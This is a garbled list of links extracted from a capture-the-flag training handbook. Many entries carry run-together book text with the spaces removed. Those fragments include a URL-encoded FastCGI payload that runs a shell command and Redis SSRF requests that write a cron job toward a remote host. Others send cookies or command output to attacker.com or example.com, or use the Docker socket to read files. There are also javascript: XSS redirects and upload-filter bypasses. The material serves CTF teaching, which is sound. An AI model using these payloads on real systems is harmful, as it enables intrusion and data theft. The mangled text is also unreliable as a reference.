Handbook for CTFers[.]pdf

https://doi.org/10.1007/978-981-19-0336-6

https://nu1l.com

https://ctftime.org/ctf/240

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_1&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_1#DOI

https://github.com/denny0223/scrabble

https://github.com/WangYihang/GitHacker

https://github.com/kost/dvcs-ripper

https://github.com/maurosoria/dirsearch

http://192.168.20.133/sql1.php?id=2

https://github.com/Audi-1/sqli-labs

http://cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_2&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_2#DOI

http://baidu.com

https://github.com/tarunkant/Gopherus

http://dwz.cn/11SMa

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf

https://github.com/n0b0dyCN/redis-rogue-server

http://www.baidu.com

https://github.com/opensec-cn/vtest

http://example.com

http://test.example.com

http://www.nu1l.com/exec/3.php?cmd=whoami%3etest

http://www.nu1l.com/

http://html5sec.org/

https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjs%E3%80%82

http://window.name

https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP

https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=http://qianbao.example.com

https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=xxxxxxxxxxxx://qianbao.example.com

https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=javascript:alert

http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate

http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context

https://www.php.net/manual/zh/ini.list.php

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715

http://aliyuncs.com

http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/

https://github.com/BlackFan/jpg_payload

https://hackmd.io/s/Hk-2nUb3Q

https://www.php.net/manual/zh/filters.string.php

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_3&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_3#DOI

https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-fun-and-profit.html?m=1

http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/

https://docs.python.org/3/library.xml.html/

https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src

https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeupfiles/server_noflag.py

http://converter.uni.hctf.fun/

https://github.com/pspaul/padding-oracle

https://github.com/CTFTraining/pwnhub_2017_open_weekday

https://github.com/bizonix/evalhook

https://github.com/CTFTraining/sctf_2018_

http://session.demo.com/

http://demo.meizj.com/pay.php?money=1000&purchaser=jack&productid=1001&seller=john

http://demo.meizj.com/

http://oauth.demo.com/main/oauth/?state=******

https://book-en.nu1l.com/

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_4&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_4#DOI

https://bbs.pediy.com/thread-246117-1.htm

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_5&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_5#DOI

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_6&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_6#DOI

https://wenku.baidu.com/view/afec9dd1d15abe23482f4d70.html

http://ddebs.ubuntu.com/

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_7&domain=pdf

https://wikipedia.org/

https://doi.org/10.1007/978-981-19-0336-6_7#DOI

https://atomcated.github.io/Vigenere/

https://github.com/Ciphey/Ciphey

https://gchq.github.io/CyberChef/

https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan

https://github.com/pablocelayes/rsa-wiener-attack

https://github.com/mimoo/RSA-and-LLL-attacks

https://github.com/Ganapati/RsaCtfTool

https://github.com/bwall/HashPump

https://github.com/blockstack/secret-sharing

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_8&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_8#DOI

https://remix.ethereum.org

https://ropsten.etherscan.io

https://github.com/ethereum/go-ethereum

https://infura.io/

https://github.com/ethereum/wiki/wiki/JSON-RPC

https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258a

https://github.com/yuange1024/ethereum_yellowpaper

https://github.com/Hcamael/ethre_source/blob/master/hctf2018.sol

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_9&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_9#DOI

http://www.fifi.org/doc/jhead/exif-e.html

https://github.com/zed-0xff/zsteg

https://github.com/chishaxie/BlindWaterMark

https://www.wireshark.org/

https://www.wireshark.org/docs/man-pages/tshark.html

https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf

https://usb.org/sites/default/files/.documents/hid1_11.pdf

https://github.com/superponible/volatility-plugins

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_10&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_10#DOI

https://xdebug.org/download.php

http://49.4.78.51:32310/flag

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_11&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_11#DOI

https://github.com/wupco/weblogger

https://github.com/MaskRay/pcap-search

http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_12&domain=pdf

https://doi.org/10.1007/978-981-19-0336-6_12#DOI

http://nmap.org/book/inst-source.html

https://pentestbox.org/zh/

https://github.com/Dliv3/Venom

https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

https://github.com/SecureAuthCorp/impacket

https://github.com/worawit/MS17-010

https://docs.microsoft.com/en-us/sysinternals/downloads/autologon

https://docs.microsoft.com/

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1

http://scanf.com

http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos

https://adsecurity.org/?p=2011

https://adsecurity.org/?p=1640

https://doi.org/10.1007/978-981-19-0336-6Jointlypublishedwith,PublishingHouseofElectronicsIndustry,Beijing,P.R.ChinaTheprinteditionisnotforsaleinChina

https://doi.org/10.1007/978-981-19-0336-6_11

http://pythonGitHacker.py

http://readme.md

http://www.zip/rar/tar.gz:oftenthesourcecodesofawebsite.4.PersonalexperienceSomechallengemaintainersmodifytheirchallengelesonlineduringCTFonlinecompetitions,andSWPbackuplesaregeneratedduetovim�sfeature.Thusplayerscouldunintentionallygetsourcecodesorsensitivemessages.Fig.1.8ResultFig.1.9Getag81IntroductiontotheWeb

http://google.zip

http://2021-7-1.zip

http://WebPage.new

https://wwwcnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.htmlforthewriteups

http://views.IndexView.as

http://views.LoginView.as

http://views.LogoutView.as

http://views.StaticFilesView.as

http://headimg.do

http://url.open

http://upug.to

http://utils.md

http://myURL.host

http://blog.loli.network

http://untar.py/tmp/pwnhub/'.$name

http://le.open

http://le.is

http://cron_run.sh

http://21cn.com

http://smtp.21cn.com

http://le.fromds_storeimportDSStorewithDSStore.open

http://router.post

http://req.body.ua

http://r.data

https://hackmd.io

http://ctx.query.ua

http://returnaxios.post

http://....e.data

http://t.data

https://hackmd.io/aaacreateacontainerdockercreate-v/ag:/agindockeralpine--entrypoint

https://hackmd.io/aaaStartthecontainerdockerstartctf:url[method]=post&url[url]=http://127.0.0.1/containers/ctf/start&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaaRetrievetheagleinthedocker.url[method]=get&url[url]=http://127.0.0.1/containers/ctf/archive?path=/agindocker&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaa741IntroductiontotheWeb

http://52dandan.cc/public_html/cong.php

http://php...de

http://52dandan.com/public_html/youwillneverknowthisle_e2cd3614b63ccdcbfe7c8f07376fe431'

https://doi.org/10.1007/978-981-19-0336-6_283

http://suchasbaidu.com

http://example.com/?url=http://%s:%s'%

http://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75YouneedtoknowtheabsolutepathofaPHPleontheserverbecauseitisdeterminedtoincludewhethertheleexistsornotandthesecurity.limit_extensionscongurationitemmustbefollowedby.php.Generally,youcanusethedefault/var/www/html/index.php.Ifyoucannotknowthewebdirectory,youcanseethelistoflesinthedefaultPHPinstallation.SeeFig.2.12.TheresultsoftheattackusingExploitareshowninFig.2.13.Usenctolistenonaportandgetattacktrafc.SeeFig.2.14.URL-encodingthedatathereinyields.%01%01%03%EF%00%08%00%00%00%00%01%00%00%00%00%00%00%00%00%01%04%03%EF%01%E7%00%00%0E%02CONTENT_LENGTH410C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_interfacefastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%1BSCRIPT_FILENAME/usr/local/lib/php/PEAR.php%0B%1BSCRIPT_NAME/usr/local/lib/php/PEAR.php%09%1FPHP_VALUEauto_prepend_le%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%1BREQUEST_URI/usr/local/lib/php/PEAR.php%01%04%03%EF%00%00%00%00%01%05%03%EF%00%29%00%00%3C%3Fphp%20var_dump%28shell_exec%28%27uname%20-a%27%29%29%3B%3F%3E%01%05%03%EF%00%00%00%00%00%00942AdvancedWeb

https://github.com/tarunkant/Gopherus,isshowninFig.2.18.2.1.4SSRFBypassingSSRFalsohassomeWAFbypassscenarios,whichwillbebrieyanalyzedinthissection.2.1.4.1IPRestrictionsUseEnclosedalphanumericsinsteadofnumbersintheIPorlettersintheURL

http://suchas127.0.0.1.xip.io

http://dwz.cn/11SMa,seeFig.2.26.Sometimestheservermayltermanyprotocols.Forexample,only�http�or�https�isallowedintheincomingURL,soyoucanwritea302redirectiononyourserverandusetheGopherprotocoltoattacktheintranet.Redis,seeFig.2.27.Fig.2.21BypassresultFig.2.22Bypassresult1002AdvancedWeb

http://parse_urlgetthehostisbaidu.com

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf.2.1.4.4DNSRebindingInsomecases,lteringforSSRFmayoccurasfollows:thehostisextractedfromtheincomingURL,thenDNSresolutionisperformed,theIPaddressisobtained,theIPaddressischeckedtoseeifitislegitimate,andifitpasses,thenthecurlisrequestedagain.IftheDNSresolutionoftherstrequestreturnsanormaladdress,buttheDNSresolutionofthesecondrequestreturnsamaliciousaddress,thentheDNSrebindingattackiscomplete.Fig.2.28Getag1042AdvancedWeb

http://reactor.run

http://www.x.cn:6379/cong:set:dir:/var/spool/cron/54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/cong:set:dblename:root54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/set:0:

http://www.x.cn:6379/saveTheresultsoftheattackareshowninFig.2.32.2.Guardnetcup2019easy_pythonTherewasachallengeonSSRFattacksonRedisinthe2019NetProtectionCup.Wereplayedthetopicafterthegameandanalyzeditasanexample.Fig.2.31phpinfo2.1SSRFVulnerabilities107

http://self.req.post

http://exp.do

https://github.com/n0b0dyCN/redis-rogue-server.Here,becauseofthetriggerpoints,itisimpossibletoruntheprocessprovidedbyexpabovestrictly.First,settheVPSslaveintheshell,thensetdblenametoexp.so,andperformthersttwostepsinexpmanually,asshowninFig.2.39.Then,removeallthefunctionsbehindtheloadmoduleandrunexpontheVPS.Finally,performtherestofthestepsmanuallyonRedisandreadtheagsusingthefunctionsprovidedbytheextension,seeFig.2.40.Fig.2.38Needtoperformapower-upFig.2.39Executionprocess2.1SSRFVulnerabilities111

http://1andwww.baidu.com

http://curlwww.vps.com

http://le.cat

http://standsforanystring.cat/tm?/*

https://github.com/opensec-cn/vtestfortesting.Afterbuildingit,starttestingitwiththefollowingtestcode.

http://1.HTTPchannelsAssumingyourdomainnameisexample.com

http://example.com/httplog/%xTheresultofechohelloexecutionissavedinthe%xvariablewiththeforcommandandthensplicedintotheURL.Aftertheabovecommandisexecuted,thesystem�sdefaultbrowserwillbecalledtoopenandaccessthespeciedwebsite,andeventually,theresultsoftheechohellocommandwillbeavailableontheplatform,seeFig.2.54.However,thedrawbackisthatthebrowserdoesnotclosewhenyoucallit,andthereisatruncationproblemwhenspecialcharactersorspacesareencountered,soyoucanborrowPowershellforextraneousdata.InPowershell2.0,executethefollowingcommand.for/F%xin

http://example.com/httplog/'+$a

http://totakeoutdata.Example.curlexample.com/`whoami`wgetexample.com/$

http://ping-nc1test.example.com

http://.UnderLinux.ping

http://.example.com

http://i.xxx.example.com

http://www.nu1l.com/exec/3.php?cmd�whoami

http://www.nu1l.com/again.exec/testtogettheresult,seeFig.2.56.2.2.3Real-lifeCommandExecutionChallengesandAnswersItisraretotestonlycommandinjectionchallengesinCTFcompetitions,buttheyareusuallycombinedintoothermoretechnicalchallenges,suchasdenylistbypass,Linuxwildcard,etc.Thefollowingaresomeclassicchallenges.2.2.3.12015HITCONBabyFirstThePHPcodeisasfollows.

http://limitingthecommandlengthtolessthanorequalto4.ls

http://leare.ls

http://attacker.com/a.js

http://attacker.com/1.html

http://html5sec.org/�.The�on�eventtriggerofmanytagsrequiresinteraction,suchasmouseoverandclick,thecodeisasfollows:

http://le.org/angular.js/1.4.6/angular.min.js

https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjsFig.2.77Result1362AdvancedWeb

http://nu1l.com/?name=

https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSPtointroduceCSP.CSP

http://.baidu.com

http://attacker.com/?cookie=xxxx

http://attacker.com/?c=

http://admin.government.vip:8000

http://admin.government.vip:8000/uploadinterfaceasanadministratortogettheag.

http://admin.government.vip:8000/hasltering,andmanyfunctionshavebeendeleted.Youneedtondawaytobypassitinordertotransmitthedata.Thelteringpartisasfollows:deletewindow.Function;deletewindow.eval;deletewindow.alert;Fig.2.90Taskpage2.3TheMagicofXSS145

http://deletewindow.post

http://date.to

http://government.vip

http://admin.government.vip:8000/';document.body.appendChild

https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�http://qianbao.example.comThecompany�scross-domainauthorizationURListheaboveURL,whichhasmultipleparameters:returntypereferstotheauthorizationtypethatcanbe302jumporform;�tpl�parameterreferstothespecicservicethatjumpedtothistime,thisistheabbreviationoftheservicename;theuparameteristheauthorizationURLcorrespondingtothisservice.Aftertesting,itisfoundthatthe302jumpisdirectlyredirectedtothesubdomainwiththepass302;theformreturnsanautomaticallysubmittedformandtheactionisthesubdomain,andtheparameteristheauthenticationparameter.Thistimetheproblemliesintheformjump.Asmentionedabove,thedomainvericationintheuparameterisverystrict,buttheprotocolnamevericationisnotstrict.Forexample:https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�xxxxxxxxxxxx://qianbao.example.comSuchaprotocolnamecanreturntheresponseheadercorrectly,butitisthelinkthat302jumpsover.IfitisnotalegalHTTP

https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�javascript:alert

http://www.example.com/%250aalert

https://wappass.example.com/v3/login/api/auth/?return_type=4&tpl=bp&u=javascript%3A//example.com/%250aeval

https://apps.xxxx.com/libs/jquery/2.1.4/jquery.min.js

https://xss.attack.com/xxx/attack.php?sign=

https://wappass.example.com/wp/?qrlogin&t=1526233652&error=0&sign=

https://wappass.example.com/wp/?qrlogin&v=1526234914892

http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate2.4.3FileSufxBlacklistVericationBypassFilesufxblacklistvericationistocreateablacklistofsufxes,checkwhetherthelesufxesareintheblacklistwhenuploading,donothingintheblacklist,anduploadthemiftheyarenot,soastorealizethelteringofuploadedles.2.4.3.1UploadFileRenameThetestcodeisshowninFig.2.105.Inthelenamerenamingscenario,onlythelesufxiscontrollable.Usuallyusesomemorepartiallesufxesthatcanbeparsedtobypasstheblacklistrestriction.ThecommonexecutablesufxesofPHPare�php3�,�php5�,�phtml�,�pht�,etc.ThecommonexecutablesufxesofASPare�cdx�,�cer�,�asa�,etc.AndJSPcantry�jspx�.SeeFig.2.106,whentheuploadedPHPlesisrestricted,youcanbypassitbyuploading�PHTML�les,asshowninFigs.2.107and2.108.Fig.2.103PHPcodeFig.2.104Result2.4FileUploadVulnerability157

http://a.ph

http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context.Whentheversionislowerthan2.3.8,becausethedefault�AllowOverride�is�All�,youcantrytouploadthe�.htaccess�letomodifypartoftheconguration,andusethe�SetHandler�tomakephpparsethespeciedle,asshowninFig.2.109.First,uploadthe�.htaccess�leandcongurethe�Files�directivetomakePHPparsethe�yu.txt�le,asshowninFig.2.110.Second,uploadthe�yu.txt�letothecurrentdirectory,atthistime�yu.txt�hasbeenparsedasaPHPle.Fig.2.109Thecontentof.htaccessFig.2.110Result2.4FileUploadVulnerability159

https://www.php.net/manual/zh/ini.list.php.Therearetwospecialcongurationsin�PHP_INI_PERDIR�mode:�auto_append_le�and�auto_prepend_le�.Theroleof�auto_prepend_le�istospecifyaletobeparsedbeforethemainleisparsed,andtheroleof�auto_append_le�istospecifyaletobeparsedafterthemainleisparsed,asshowninFig.2.112.Fig.2.111CongurationinPHP1602AdvancedWeb

http://x.php.xxx

https://cve.mitre.org/cgi-bin/cvename.cgi?name�CVE-2017-15715.AccordingtothedescriptionoftheCVE,itcanbeseenthatintheHTTPD2.4.0to2.4.29version,inthe�FilesMatch�directive,the�$�intheregularpatterncanmatchthenewlinecharacter,whichmaycausetheblacklisttobebypassed.

http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/2.4.5.4SomeWebCongurationsThatCanBeBypassedUsuallytheuploaddirectoryisconguredinthewebservertoprohibitleexecu-tion,anditmaybebypassedinthecaseofimproperconguration.1.Bypasscausedby�pathinfo�ThecongurationofNginxisasfollows:Fig.2.125PHPcodeFig.2.126ResultFig.2.127Result1682AdvancedWeb

http://yu.php.aaa

https://example.com/image.jpg

https://github.com/BlackFan/jpg_payload.ThetestcodeisshowninFig.2.137.First,uploadthenormalimagele,thendownloadtherenderedimage,run�jpg_payload.php�toprocessthedownloadedimage,injectthecodeintotheimagele,anduploadthenewlygeneratedimage.Youcanseethescriptcodeinjectedafter�imagecreatefromjpeg�stillexists,seeFig.2.138.2.4.7ExploitwithUploadtheGeneratedTemporaryFilePHPwillgeneratetemporarylesduringleupload,anddeletestemporarylesafteruploaded.Whenthereisalocalleinclusionvulnerabilitybuttheuploadfunctionisnotfoundandthereisnoletoinclude,youcantrytoincludethetemporarylegeneratedbytheuploadtocooperatewithit.Fig.2.137PHPcodeFig.2.138Executionprocess1742AdvancedWeb

http://session.upload_progress.name

https://hackmd.io/s/Hk-2nUb3Q.Fig.2.140Executionprocess1762AdvancedWeb

http://st.st

https://www.php.net/manual/zh/lters.string.php

http://sothemethodwillreturnfalse.is

https://doi.org/10.1007/978-981-19-0336-6_3195

http://www.nu1l.com:5555

https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-Fig.3.8Result2023AdvancedWebChallenges

http://whichwasfurtherexplored.in

http://etc.to

http://belongtotheglobalmodule__builtins__.soyoucantry__builtins__.open

http://del__builtins__.open

http://__builtins__.open

http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/3.2SecurityIssuesinPython219

http://self.id

http://Trueapp.run

http://weusethenccommandtolistenontheporttoseethedatareceivedontheport.nc

https://docs.python.org/3/library.xml.html/.ThefollowingcodecontainstwocommonpayloadsforXXEattack,oneforreadinglesandtheotherforprobingtheintranet,andthenparsingtheXMLthereinviaPython.Thecodeitselfdoesnotrestricttheexternalentities,whichleadstoXXEvulnerabilities.#coding=utf-8importxml.saxx=

http://xxx.xxx.xxx.xxx/?data=%le;'

http://arandom.py

http://srandom.py

http://nowu.save

https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src.Accordingtothehint,agishitcon{ENCRYPTION_KEY},andweknowthatitisacombinationofpasswordandWeb;lookingatthehintinterface,itsays:assertENCRYPTION_KEY.islower

http://DES.new

http://app.py

https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeuples/server_noag.py.Underthe/agroute,theagisdisplayedtothepageonlyiftheAES-encryptedJSONstringstoredinthecookieisfetchedandtheadmineldis1.@app.route

http://Random.new

http://AES.new

http://converter.uni.hctf.fun/,whosemainfunctionistoenterastringfortheuserandconvertthedocumentinthatformattoanotherformatviatheserver'sconverter.NoteFig.3.40Paddingresult2403AdvancedWebChallenges

https://github.com/pspaul/padding-oracle.Withthehelpofit,youonlyneedtomodifyasmallpieceofcodetoimplementallthefeatures.Thecodeforthischallengeisasfollows:frompadding_oracleimportPaddingOraclefromoptimized_alphabetsimportjson_alphabetimportrequestsdeforacle

http://converter.uni.hctf.fun/convert',headers=headers

https://github.com/jbzteam/CTF/tree/master/BackdoorCTF2017

http://requests.post

https://extend-me-please.herokuapp.com/login',data=post,cookies=cookies

http://suchas.pyinPython.Pythoncompiles.py

http://ledownloadlimitsthatthe.py

https://github.com/CTFTraining/pwnhub_2017_open_weekday.ThechallengeprovidesabackupleprocessedbyPHPJiami,andyoucandownloadtheencryptedcodedirectly,asshowninFig.3.58.Therearealotofevalhookingplug-insourcecodeontheInternet,suchashttps://github.com/bizonix/evalhook,onlyneedtocompileandloadtothePHP,thenruntheencryptedcode,youcangetthedecryptedones,asshowninFig.3.59.Inadditiontocodeobfuscationinthisway,usingplug-instoencryptcodeisanotherwaytodoit.ThismethodhooksPHP'sunderlyingzend_compile_*,decryptsthesourcecodeinthefunctionafterthehook,andpassesthedecryptedsourcecodetothePHPexecutable.Forthistypeofencryption,wecanstilldecryptitinamannersimilartoevalhook.Fig.3.58TheencryptedcodedirectlyFig.3.59Thesourcecode2563AdvancedWebChallenges

https://github.com/CTFTraining/sctf_2018_babysyc.git.Bydownloadingtheindex.phpviaaarbitraryledownloadvulnerability,wefountitisencrypted.Bythecontentofphpinfo.php,weknowthattheserverhasapluginnamedencrypt_php,sowecandownloaditinthespeciedplug-indirectory.Analyzetheencryptionplug-in,whichhooksthezend_compile_le,asshowninFig.3.60.Lookagainatthelogicintheencrypt_compile_le.Attheendofthefunctionexecution,theencryptordirectlysendsthedecryptedresultbacktotheoriginalzend_compile_le,asshowninFig.3.61.Youcanprintthedecryptedcodebysimplychangingthepositionofthehookplug-insothatthehookfunctioniscalledafterthedecryptionfunction,asshowninFig.3.62.AnotherwaytoencryptistoencryptthecompiledOpcodes.Monitoringzend_compile_*willhavenoeffectbecausetheencryptionwon�tbecompiledinFig.3.60Analyzetheencryptionplug-in,whichhooksthezend_compile_leFig.3.61Process3.3CryptographyandReverseKnowledge257

http://session.demo.com/login.php?sessionId�xxxx;victimBexecutesAfterloggingin,thesessionIDcorrespondingtoSwillcontaintheidentifyinginformationofuserB.TheattackercanalsouseStogainaccesstothevictim'saccount.2.Data-relatedlogicalawsInreality,fortheshoppingsystemwithinterwovenbusinessfunctions,normalbusinessfunctionswillinvolveavarietyofscenarios,suchascommoditybalance,moneyexpenditure,commodityattributiondetermination,ordermodication,useofvouchers,etc.Purchaseofthesefunctions,forexample,intheprocessofbuyinginvolvesmerchantsbalancechangesofcommodity,thebuyeroftheamountofconsumption,suchasservertransactionhistorydata,becauseinvolvesmoretypesofdata,sointheactualdevelopmentprocess,forsomeofthedatatypeofthepossibilityofill-consideredcheckthen,suchascostamountistheamountofpositiveandnegativedecision,ifwecanchangeandotherissues.Theseproblemsareoftennotdirectlycausedbybugsatthecodelevel,butratherbyapartialfailureFig.3.69CookiesFig.3.70Cookies2643AdvancedWebChallenges

http://demo.meizj.com/pay.php?money�1000&purchaser�jack&productid�1001&seller�john.Theparametershavethefollowingmeanings:Moneyrepresentstheamountspentinthepurchase,Thepurchasers�username,Productidrepresentsthepurchaseinformation,andSellerrepresentstheseller�susername.IfthebackendpurchasefunctionisimplementedthroughthisURL,thenthebusinesslogiccanbedescribedas�purchaserspentmoneytobuytheproductidproductfromseller�.Whenthetransactioniscompletednormally,themoneyisFig.3.71Thevericationprocess3.4LogicFlaws265

http://demo.meizj.com/pay.php?money�1&purchaser�jack&productid�1001&seller�john.Atthispoint,theattackercompletesthepurchaseprocesswithonly1yuan.Thisisessentiallybecausethebackenddoesnotverifythetypeandformatofthedataeffectively,resultinginunexpectedsituations.Therefore,intheauthor�sopinion,data-relatedlogicvulnerabilitiesarebasicallycausedbyerrorsandomissionsindataverication.3.4.2LogicFlawsinCTFsComparedwithotherWebaws,logicawsusuallyrequirethecombinationofmultiplebusinessfunctionvulnerabilities.Therefore,theyoftenexistincomplexFig.3.72Theattackprocess2663AdvancedWebChallenges

http://oauth.demo.com/main/oauth/?state�******.Afteraccessingthelink,theOAuthaccountwillbeautomaticallyboundtoaregularaccount.ThekeyisthatordinaryuserscancompletethebindingofordinaryaccountandOAuthaccountbyaccessingthelinkwithToken.Similarly,theadministratorcanaccessthelinktocompletetheaccountbinding.Thearbitraryaddressskippingvulnerabilitycanbeusedtodeployanaddressskippingpageontheremoteserver.TheskippingaddressisthelinkboundwithToken.Whentheadministratoraccessesthesubmittedlink,itisrstredirectedtotheremoteserverandthenredirectedtothebindingpagetocompletethebindingbetweentheOAuthaccountandtheadminis-tratoraccount.Atthispoint,usetheOAuthaccounttoquicklylogintotheadministratoraccount.3.4.3SummaryofLogicalFlawsIncontrasttothevariousWebvulnerabilitiesmentionedearlier,thereisnoxedformatforpresentinglogicalvulnerabilities.Toexploitlogicholes,participantsneedtohaveagoodunderstandingofbusinessprocesses.Logicalvulnerabilityminingintherealenvironmentalsoneedstoconsideravarietyofauthenticationmethodsanddifferentbusinesslines,whicharenotdiscussedhere,readerscanndthefunintheirdailyworkandlife.3.5SummaryIngeneral,WebchallengesweretheeasiesttogetstartedinalldirectionsintheCTFcompetition.ThebookdividesthemainvulnerabilitiesinvolvedinWebtopicsintothreelevels:�gettingstarted�,�advanced�and�expanded�,eachwithonechapter,allowingreaderstostepbystep.However,becausetheclassicationofWebvulnerabilitiesisverycomplexandcomplicated,andtechnologyupdatesarefasterthanothertypesoftopics,readersareexpectedtosupplementrelevantknowledgewhilereadingthisbook,sothattheycanlearnfromoneanotherandimprovetheirownability.Fortherelevantcontentofthisbook,readerscanndcorrespondingsupportingexamplestopracticeontheN1BOOK

https://book-en.nu1l.com

https://doi.org/10.1007/978-981-19-0336-6_4269

http://schemas.android.com/apk/res/android

http://com.android.server.pm

http://andxposedminversionistheminimumversionoftheXposedFrameworkrequired.Fig.4.11ChoosetheapplicationtobedebuggedFig.4.12Choosethe.so

http://libc.so

http://Memory.read

http://elds__.map

http://libnative-lib.so

http://android.app

http://Usethefunctionandroid.os.Debug.is

http://androidxref.com/8.1.0_r33/xref/art/runtime/dex_le.cc#OpenCommon----------------------------------------------------------------------------------------Interceptor.attach

http://libart.so

http://com.xxx.xxx

http://dex_size.to

http://sshell.art/dex2oat/dex2oat.ccAndroid8.xmakedex2oat//compilationandverication.verication_results_-

http://le.cc

http://Fig.4.16JEBFig.4.17liban-a.so

https://doi.org/10.1007/978-981-19-0336-6_5295

http://NTkernelbegantointroduceMinWinafterWindowsVista.ss

https://github.com/pwndbg/pwndbg.Youcanseetheinstallationstepsinthe�How�.Afterinstallation,thePwndbgpluginwillbeautomaticallyloadedeverytimeyoustartGDB.2.OpentheleYoucanmakeGDBopensthetargetleinthefollowingthreeways.1:Youcanspecifyanexecutableleintheformof�gdb./2-simpleCrackme�

http://visualgdb.com/gdbreference/commands/xforalistofformats.�p

http://justrunida_script.py

https://github.com/push0ebp/sig-databaseorhttps://github.com/Maktm/FLIRTDB.OryoucanmakeuseoftheFLAIRtoolprovidedwithintheIDASDK,createyourownsignaturebasedonexistingstaticlibraryleslike.a,.lib,etc.,putitinsigfolder,andthenloaditinIDA.FortheuseoftheFLAIRtool,pleaserefertotheInternetforinformation.3.BinarySimilarityDuetodifferencesinvariousways,suchascompilationagsorenvironments,signaturesmaynotmatchtheprovidedlibraryexactly.However,evenifthecompilationenvironmentisdifferent,therearesimilaritiesbetweencompiledlibraryfunctionsinbinariesthatusethesamelibrary.Ifweknowthattheprogrammerusedacertainlibrary,andifwecangetastaticallycompiledbinarylethatcontainsthedebugsymbolsandalsousesthelibrary,wecanusethebinarysimilarityapproachtoidentifyeachlibraryfunction.ApopulartoolforbinarycomparisonisBinDiff

https://www.zynamics.com/bindiff.html

http://dp.py

https://github.com/x64dbg/ScyllaHide

https://www.npointer.cn/question.html?id�5

http://at.py

https://security.tencent.com/index.php/blog/msg/112

https://www.hex-rays.com/blog/hex-rays-microcode-api-vs-obfus-cating-compiler/

